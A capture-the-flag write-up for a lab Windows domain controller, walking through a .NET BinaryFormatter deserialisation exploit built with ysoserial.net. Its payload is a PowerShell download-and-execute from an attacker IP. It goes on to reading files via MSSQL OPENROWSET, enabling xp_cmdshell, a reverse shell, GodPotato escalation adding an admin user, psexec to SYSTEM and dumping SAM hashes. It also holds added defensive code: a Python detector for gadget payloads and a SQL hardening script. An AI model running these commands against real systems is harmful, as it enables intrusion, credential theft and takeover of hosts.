> /root/.dotnet/tools/ilspycmd -p -o decompile ScrambleLib.dll

Read the decompiled code and understand how the commands work. The payloads are .net serialised.

Use ysoserial.net to exploit the .NET deserialisation vulnerability; this needs to run on Windows, https://github.com/pwntester/ysoserial.net

> ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') }"

Run a nc listener and upload the payload

> nc 10.10.16.3 4411
> UPLOAD_ORDER;<base64 payload from ysoserial>
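From the defender's side, the tell-tale of this attack is a client-supplied BinaryFormatter stream naming a gadget type. The block below is an added example, not the writeup's or the service's code: it scans lines in the `COMMAND;operand` shape visible in the exchange above (that framing is an assumption), base64-decodes the UPLOAD_ORDER operand, checks for the BinaryFormatter SerializationHeaderRecord and looks for type names such as the WindowsIdentity gadget used here; the sample lines are constructed and the "malicious" one is only a header plus a type name, not a working chain.

```python
import base64
import binascii
import re

# BinaryFormatter streams begin with a SerializationHeaderRecord:
# RecordType 0x00, RootId 1, HeaderId -1, MajorVersion 1, MinorVersion 0.
# In base64 this is the well-known "AAEAAAD/////AQAAAAAAAAA" prefix.
BINARYFORMATTER_HEADER = bytes.fromhex("00" "01000000" "ffffffff" "01000000" "00000000")

# Type names that should never appear in a client-supplied order blob.
# WindowsIdentity is the ysoserial.net gadget the writeup used; the rest
# are other commonly abused .NET types (assumed list, extend as needed).
SUSPICIOUS_TYPES = (
    b"System.Security.Principal.WindowsIdentity",
    b"System.Security.Claims.ClaimsIdentity",
    b"System.Windows.Data.ObjectDataProvider",
    b"System.Diagnostics.Process",
)

# Assumed framing, taken from the visible exchange: "COMMAND;operand"
_LINE_RE = re.compile(r"^([A-Z0-9_.]+);(.*)$")


def inspect_order_line(line: str) -> dict:
    """Classify one line received by the orders service."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return {"command": None, "verdict": "malformed"}
    command, operand = m.group(1), m.group(2)
    if command != "UPLOAD_ORDER" or not operand:
        return {"command": command, "verdict": "ok"}
    try:
        blob = base64.b64decode(operand, validate=True)
    except (binascii.Error, ValueError):
        return {"command": command, "verdict": "invalid-base64"}
    is_bf = blob.startswith(BINARYFORMATTER_HEADER)
    hits = [t.decode() for t in SUSPICIOUS_TYPES if t in blob]
    if is_bf and hits:
        verdict = "alert"            # serialized object graph naming a gadget type
    elif is_bf:
        verdict = "binaryformatter"  # worth logging even without a known gadget
    else:
        verdict = "ok"
    return {"command": command, "verdict": verdict,
            "binaryformatter": is_bf, "gadget_types": hits}


def scan(lines):
    """Run inspect_order_line over a sequence of captured protocol lines."""
    return [inspect_order_line(line) for line in lines]


# Constructed sample traffic (not captured from the box).
_BENIGN_ORDER = base64.b64encode(b"ORDER#1001;qty=3;sku=ENG-200").decode()
_SUSPECT_ORDER = base64.b64encode(
    BINARYFORMATTER_HEADER + b"\x0c\x02\x00\x00\x00"
    + b"System.Security.Principal.WindowsIdentity" + b"\x0b"
).decode()
SAMPLE_LINES = [
    "SCRAMBLECORP_ORDERS_V1.0.3;",       # banner as seen in the nmap fingerprint
    "UPLOAD_ORDER;" + _BENIGN_ORDER,
    "UPLOAD_ORDER;" + _SUSPECT_ORDER,
    "UPLOAD_ORDER;not*base64!",
]

if __name__ == "__main__":
    for result in scan(SAMPLE_LINES):
        print(result)
```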

Get the reverse shell and catch the root flag

rooted

Alternative Roots

Unintended File Read Via MSSQL

Wh04m1 got root blood on Scrambled using this technique. This post on MSSQL Tips talks about how to read a file using MSSQL using the BULK option, which was added to SQL Server 2005. Their example query is:

SELECT BulkColumn 
FROM OPENROWSET (BULK 'c:\temp\mytxtfile.txt', SINGLE_CLOB) MyFile 

OPENROWSET returns a single column named BulkColumn. MyFile is a correlation name, which isn’t really important here other than it must exist, and it doesn’t really matter what I put there.

OPENROWSET, when used with the BULK provider takes a file path and one of three keywords:

  • SINGLE_BLOB returns as a varbinary
  • SINGLE_CLOB returns as a varchar
  • SINGLE_NCLOB returns as a nvarchar

So to read root.txt, I’ll run:

SQL> SELECT BulkColumn FROM OPENROWSET(BULK 'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) MyFile
BulkColumn

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

b'a01b823bd0d7c97c98646d36d1d03c02\r\n' 

GodPotato

Unintended way

Get Execution Via MSSQL

To get to a place where I could run RoguePotato, I’ll need to be executing with the SeImpersonatePrivilege. I’m most likely to find this through the MSSQL service.

To run commands via MSSQL, I’ll use the xp_cmdshell stored procedure.

Rogue&JuicyPotato will work on Scrambled, but I’ll use this opportunity to show GODPOTATO.

PS C:\programdata> whoami
whoami
scrm\miscsvc
PS C:\programdata> iwr 10.10.14.2:8000/rcat_10.10.14.2_9001.exe -outfile rcat_10.10.14.2_9001.exe
iwr 10.10.14.2:8000/rcat_10.10.14.2_9001.exe -outfile rcat_10.10.14.2_9001.exe


┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-mssqlclient -k dc1.scrm.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SCRM\administrator  dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups   
--------   -----------------   ----------   ---------------   -------------   
MiscSvc    ScrambledEggs9900   scrm.local                90               0   

SQL (SCRM\administrator  dbo@master)> whoami /priv
ERROR(DC1): Line 1: Incorrect syntax near '/'.
SQL (SCRM\administrator  dbo@master)> whoami 
ERROR(DC1): Line 1: Could not find stored procedure 'whoami'.
SQL (SCRM\administrator  dbo@master)> xp_cmdshell whoami
ERROR(DC1): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (SCRM\administrator  dbo@master)> EXECUTE sp_configure 'show advanced options', 1
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> RECONFIGURE
SQL (SCRM\administrator  dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> RECONFIGURE
SQL (SCRM\administrator  dbo@master)> xp_cmdshell whoami
output        
-----------   
scrm\sqlsvc   

NULL          

SQL (SCRM\administrator  dbo@master)> xp_cmdshell C:\\programdata\\rcat_10.10.14.2_9001.exe
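The session above flips xp_cmdshell on with sp_configure and then runs commands as the engine's service account (scrm\sqlsvc, which the whoami /priv output further down shows holding SeImpersonatePrivilege). The script below is an added audit and hardening example, not part of the original post; it assumes only a SQL Server 2008 R2 SP1 or later instance (for sys.dm_server_services) and a sysadmin login for the sp_configure calls, and uses only Microsoft's catalog views and stored procedures.

```sql
-- Added audit/hardening example (not from the original post). Shows the state
-- of the switches used in the session above, the Windows identity that
-- xp_cmdshell output runs as, and how to turn the feature back off.

-- 1. Is xp_cmdshell enabled? sys.configurations lists advanced options even
--    when 'show advanced options' is 0; value_in_use = 1 means enabled.
SELECT name, value, value_in_use, is_advanced
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Which Windows account does the engine run as? A sysadmin caller's
--    xp_cmdshell commands run under this account's token, so a domain user
--    with SeImpersonatePrivilege here is what makes the Potato family work.
--    (Non-sysadmin callers use the proxy account set with
--    sp_xp_cmdshell_proxy_account instead.)
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services;

-- 3. Disable xp_cmdshell again (the reverse of the sequence in the session).
--    Any sysadmin can re-enable it the same way, so this only holds if
--    sysadmin membership is kept small.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Confirm the change took effect.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

The second query is the one worth keeping in a regular review: the service account shown there is the identity every xp_cmdshell, OPENROWSET(BULK) and CLR call acts with on the host, and running it as a low-privilege virtual account rather than a domain user removes most of what step 3 of this write-up relies on.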

.

rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.168] 58416
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Windows\system32> cd c:\programdata
cd c:\programdata
PS C:\programdata> .\god.exe -cmd "net user puck Start123 /add"
PS C:\programdata> .\god.exe -cmd "net localgroup Administrators puck /add"

.

impacket-psexec scrm.local/puck:Start123@dc1.scrm.local -k   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Requesting shares on dc1.scrm.local.....
[*] Found writable share ADMIN$
[*] Uploading file mwRrJIMc.exe
[*] Opening SVCManager on dc1.scrm.local.....
[*] Creating service BSRw on dc1.scrm.local.....
[*] Starting service BSRw.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

This gets the same hashes:

impacket-secretsdump scrm.local/puck:Start123@dc1.scrm.local -k    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x33d8cbadba9e3f89bd60e5bfe64743e3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ebb16eb3b0b1d0bea029cab7d18e534c:::
...

that was fun